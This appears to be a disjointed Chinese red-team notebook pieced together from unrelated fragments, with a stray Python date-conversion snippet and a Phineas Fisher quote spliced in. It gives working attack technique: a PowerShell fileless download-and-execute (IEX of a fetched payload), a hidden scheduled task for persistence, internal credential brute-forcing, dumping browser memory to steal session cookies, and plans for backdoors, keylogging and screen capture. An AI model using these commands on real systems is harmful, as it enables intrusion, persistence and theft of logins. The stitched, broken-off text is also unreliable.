😊#|

[mysql-udf-exploitation]https://osandamalith.com/2018/02/11/mysql-udf-exploitation
MSF的dll: https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

0x01 准备工作

先检查运行的mysql结构:

select @@version_compile_os, @@version_compile_machine;
show variables like '%compile%';

结果如下:

MySQL [(none)]> select @@version_compile_os, @@version_compile_machine;
+----------------------+---------------------------+
| @@version_compile_os | @@version_compile_machine |
+----------------------+---------------------------+
| Win64                | x86_64                    |
+----------------------+---------------------------+
MySQL [(none)]> show variables like '%compile%';
+-------------------------+--------+
| Variable_name           | Value  |
+-------------------------+--------+
| version_compile_machine | x86_64 |
| version_compile_os      | Win64  |
+-------------------------+--------+

在Mysql 5.0.67版本开始，UDF的文件必须放在mysql的插件目录: select @@plugin_dir;

可以在开启mysql的时候设置plugin的目录:

指定目录:
mysqld.exe –plugin-dir=C:\\temp\\plugins\\

指定配置文件:
mysqld.exe --defaults-file=C:\\temp\\my.ini

配置文件包括如下内容:
[mysqld]
plugin_dir = C:\\temp\\plugins\\

老版本的Mysql搜索UDF路径是按照如下的顺序来的:

COM is the foundation technology for Microsoft’s OLE (compound documents), ActiveX (Internet-enabled components), as well as others.

我就瞎写了:

COM是在1990s的时候诞生的，可用来分离代码模块和其它内容。

文件下载

Powershell无文件落地执行
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;

下载文件,如果需要下载exe，转换成hex或者base64，再编码
powershell -Command "$o = [activator]::CreateInstance([type]::GetTypeFromCLSID(\"F5078F35-C551-11D3-89B9-0000F81FE221\")); $o.Open(\"GET\", \"http://127.0.0.1/payload\", $False); $o.Send();  $o.responseText | Out-File C:\filename.exe"

定时任务

$TaskName = [Guid]::NewGuid().ToString()
$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))
$Instance.Connect()
$Folder = $Instance.GetFolder("\")
$Task = $Instance.NewTask(0)
$Trigger = $Task.triggers.Create(0)
$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay))
$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay + 120))
$Trigger.ExecutionTimelimit = "PT5M"
$Trigger.Enabled = $True
$Trigger.Id = $Taskname
$Action = $Task.Actions.Create(0)
$Action.Path = “cmd.exe”
$Action.Arguments = “/c whoami”
$Action.HideAppWindow = $True
$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)

function Convert-Date {       

        param(
             [datetime]$Date

        )       

        PROCESS {
               $Date.Touniversaltime().tostring("u") -replace " ","T"
        }
}

• https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

0x01 环境

1. Linux主机www权限
2. 主机无法出外网
3. 正向代理无法使用
4. B段内网

收集信息

#####F-Scrack.py

获取Redis, ES等
PS: Scrack.py的mssql模块爆破不准确，可以自己写一个简单的

python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6

Redis

key较多的时候不要使用keys *

查看基本信息: master，数量，版本号
使用scan查看keys: scan 0 match * count 100 
查看类型: type <key>
hash类型: hgetall <key>

MySQL

windows下可以先测试是否可写入插件目录:

需要把数据从xlsx读到elk，再做数据分析，遇到一个问题是把当在elk里面处理日期类的数据的时候，需要把数据转换为Date类型:

def float2utc(num):
	date = datetime.datetime(*xldate_as_tuple(num, 0))

	local = pytz.timezone("Asia/Shanghai")
	local_dt = local.localize(date, is_dst=None)
	utc_dt = local_dt.astimezone(pytz.utc)
	timeStr = datetime.datetime.strftime(utc_dt, "%Y-%m-%dT%H:%M:%S.%f")
	timeStr = timeStr[:-3]
	#cell = date.strftime('%Y/%m/%d %H:%M')
	return timeStr + "Z"

• https://stackoverflow.com/questions/40294803/datetime-in-elasticsearch-how-to-handle-timezon

[Thread-Phineas-Phisher-Hack-Back-Bank]https://dummieshub.com/Thread-Phineas-Phisher-Hack-Back-Bank

从浏览器dump登陆Cookie

procdump64 /accepteula -r -ma PID_of_browser
strings64 /accepteula * .dmp | findstr PHPSESSID 2> nul
findstr PHPSESSID * .dmp> tmp
strings64 /accepteula tmp | findstr PHPSESSID 2> nul

准备后路

1. 常用的操作用一个后门
2. 留一个备用的后门，第一个失效之后启用

收集信息

用到一下模块:

MSF每5s截屏:
post/windows/gather/screen_spy

再加上一个键盘记录器，通过这两个东西收集信息，了解大概的工作流程。


使用Windows自带的PSR截屏：
psr.exe /start /gui 0 /output C:\Users\Dan\Desktop\cool.zip;
Start-Sleep -s 20;
psr.exe /stop;

END

Hacking has made me feel alive. It started as a way to self-medicate depression. Later I
realized that, in reality, I could do something positive. I don't regret the way I grew up at 
all, it brought several beautiful experiences to my life. But I knew I couldn't continue 
living that way. So I began to spend more time away from my computer, with other people, 
learning to open myself to the world, to feel my emotions, to connect with others, to accept 
risks and be vulnerable. Things much harder than hacking, but at the mere hour the reward is 
more worth it. It is still an effort, but even if it is slow and wobbly, I feel that I am on 
my way.